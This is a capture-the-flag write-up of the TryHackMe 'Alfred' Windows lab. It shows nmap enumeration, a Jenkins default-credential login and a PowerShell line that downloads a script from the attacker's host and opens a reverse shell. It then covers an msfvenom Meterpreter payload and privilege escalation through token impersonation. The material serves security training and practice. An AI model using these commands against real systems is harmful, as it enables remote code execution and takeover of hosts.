THM - Alfred
March 6, 2022•655 words
Alfred
skibum 8/30/2020
Enumeration and initial shell
NMAP scan
nmap -sV -sT -Pn -oX nmap/intial <Machine_IP> Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT Nmap scan report for <Machine_IP> Host is up (0.22s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 3389/tcp open ssl/ms-wbt-server? 8080/tcp open http Jetty 9.4.z-SNAPSHOT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
There are two ports with web servers on them
2.1. Port 80 which just contains a RIP for Bruce Wane
2.2. Port 8080 is a login for JenkinsCheck for default login values.
Test username:Password as admin:admin- This worked to grant us access.
From the main menu select project in the center > Select configure this allow you to modify the code to be run on the underlining system.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
Run a
python3 -m http.server
andnc -nlvp 1337
before building the project.A user shell is now avaible.
Priv esc
Generate a meterperter shell
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe
Download to the shell
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')"
Set the multi handler with the windows/meterpreter/reverse_tcp payload
Run the exploit on the msfconsole and then run the exe on the shell.
With the meterperter shell up check the privileges.
PS> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Disabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Disabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled SeCreatePagefilePrivilege Create a pagefile Disabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled SeUndockPrivilege Remove computer from docking station Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
As the SeImpersonatePrivilege is enables lets try and impersonate it. Load the
load incognito
module in the meterpreter sessionLets list the tokens
list_tokens -g [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== \ BUILTIN\Administrators BUILTIN\IIS_IUSRS BUILTIN\Users NT AUTHORITY\Authenticated Users NT AUTHORITY\NTLM Authentication NT AUTHORITY\SERVICE NT AUTHORITY\This Organization NT AUTHORITY\WRITE RESTRICTED NT SERVICE\AppHostSvc NT SERVICE\AudioEndpointBuilder NT SERVICE\BFE NT SERVICE\CertPropSvc NT SERVICE\CscService NT SERVICE\Dnscache NT SERVICE\eventlog NT SERVICE\EventSystem NT SERVICE\FDResPub NT SERVICE\iphlpsvc NT SERVICE\LanmanServer NT SERVICE\MMCSS NT SERVICE\PcaSvc NT SERVICE\PlugPlay NT SERVICE\RpcEptMapper NT SERVICE\Schedule NT SERVICE\SENS NT SERVICE\SessionEnv NT SERVICE\Spooler NT SERVICE\TrkWks NT SERVICE\UmRdpService NT SERVICE\UxSms NT SERVICE\WdiSystemHost NT SERVICE\Winmgmt NT SERVICE\WSearch NT SERVICE\wuauserv Impersonation Tokens Available ======================================== NT AUTHORITY\NETWORK NT SERVICE\AudioSrv NT SERVICE\CryptSvc NT SERVICE\DcomLaunch NT SERVICE\Dhcp NT SERVICE\DPS NT SERVICE\LanmanWorkstation NT SERVICE\lmhosts NT SERVICE\MpsSvc NT SERVICE\netprofm NT SERVICE\nsi NT SERVICE\PolicyAgent NT SERVICE\Power NT SERVICE\ShellHWDetection NT SERVICE\W32Time NT SERVICE\WdiServiceHost NT SERVICE\WinHttpAutoProxySvc NT SERVICE\wscsvc
Since the BUILTIN\Administrators is available lest try and impersonate it
impersonate_token "BUILTIN\Administrators"
We are now the NT AUTHORITY\SYSTEM lets migrate the permissions to make sure we maintain it
Use the
PS
command to list the processes and check for the services.exe process. It was 668!Now lets migrate the permissions
migrate 668
P0wn3d!!! now read the root.txt file at C:\Windows\System32\config